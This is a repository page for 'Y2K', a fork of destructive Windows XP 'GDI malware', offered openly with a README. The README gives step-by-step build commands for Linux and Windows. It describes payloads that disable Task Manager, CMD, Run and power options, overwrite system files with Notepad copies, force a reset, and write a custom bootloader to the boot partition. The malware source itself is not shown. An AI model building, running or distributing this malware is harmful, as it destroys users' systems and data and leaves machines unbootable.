muteplayer
/
Y2K
1
0
Fork 0
Code Issues Pull Requests Releases 2 Activity
Windows XP GDI malware created by Jotaxisz
21 Commits 1 Branch 2 Tags 7.6 MiB
C++ 80.5%
Assembly 15.9%
Makefile 3.6%
Go to file
Vega 88eb01df8f
Misc changes 		2024-02-22 02:15:49 +00:00
mbr Add dynamic bootloader compilation 2024-02-22 02:06:07 +00:00
res First commit 2024-02-13 02:03:33 +00:00
src Misc changes 2024-02-22 02:15:49 +00:00
.gitignore Add dynamic bootloader compilation 2024-02-22 02:06:07 +00:00
LICENSE First commit 2024-02-13 02:03:33 +00:00
Makefile Add dynamic bootloader compilation 2024-02-22 02:06:07 +00:00
README.org Add dynamic bootloader compilation 2024-02-22 02:06:07 +00:00

README.org

Y2K GDI Malware

A fork of a malware created by Jotaxisz with a reworked source structure (minor changes).

To run this malware you need a Windows XP macchine with date set to <2000-01-01 Sat> or <2000-01-02 Sun> wich will change the payload.

Building

On Linux

You will need MinGW and Make. You can parse the argument CXX to change the C++ compiler (the default is i686-w64-mingw-g++) and the WINDRES to change the default windres command (the default is i686-w64-mingw-windres). Others arguments are NASM and LD for changing the nasm and ld commands. You can change the CXX and WINDRES and LD to x86_64-w64-mingw-g++ and x86_64-w64-mingw-windres and x86_64-w64-mingw32-ld respectively to build it natively for 64bit envioriments.

Arch linux: 

pacman -S make mingw-w64 nasm
make

Ubuntu 

apt install make mingw-w64 nasm
make

You can also execute make clean to clean bin/ folder, .o files on res/ and .bin and .o files on folder mbr/.

On Windows

You will need to install MinGW or another C++ compiler and NASM. Then run the command:

windres -o res\resource.o res\resource.rc
nasm -o mbr\bootloader.bin mbr\bootloader.asm
ld -r -b binary -o mbr\bootloader.o mbr\bootloader.bin
g++ src\* res\resource.o mbr\bootloader.o -static -l gdi32 -l winmm -o Y2K

Bootloader

This project has a void function under the namespace called byeByeBoot, this function load and write the custom bootloader code to the EFI partition. The source code the binary can be found here.

Payloads

If you execute the malware at any date it will always disable the Task Manager, CMD, Execute and Power Options.

<2000-01-01 Sat>

This payload will start the res/alarm.wav and then start the GDI part and replace multiples system files with copies of Notepad executables, after the visual payload ended after forcing reseting the machine the bootloader payload will start.

<2000-01-02 Sun>

This payload will start the res/jeff_syndicate_hip_hop.wav.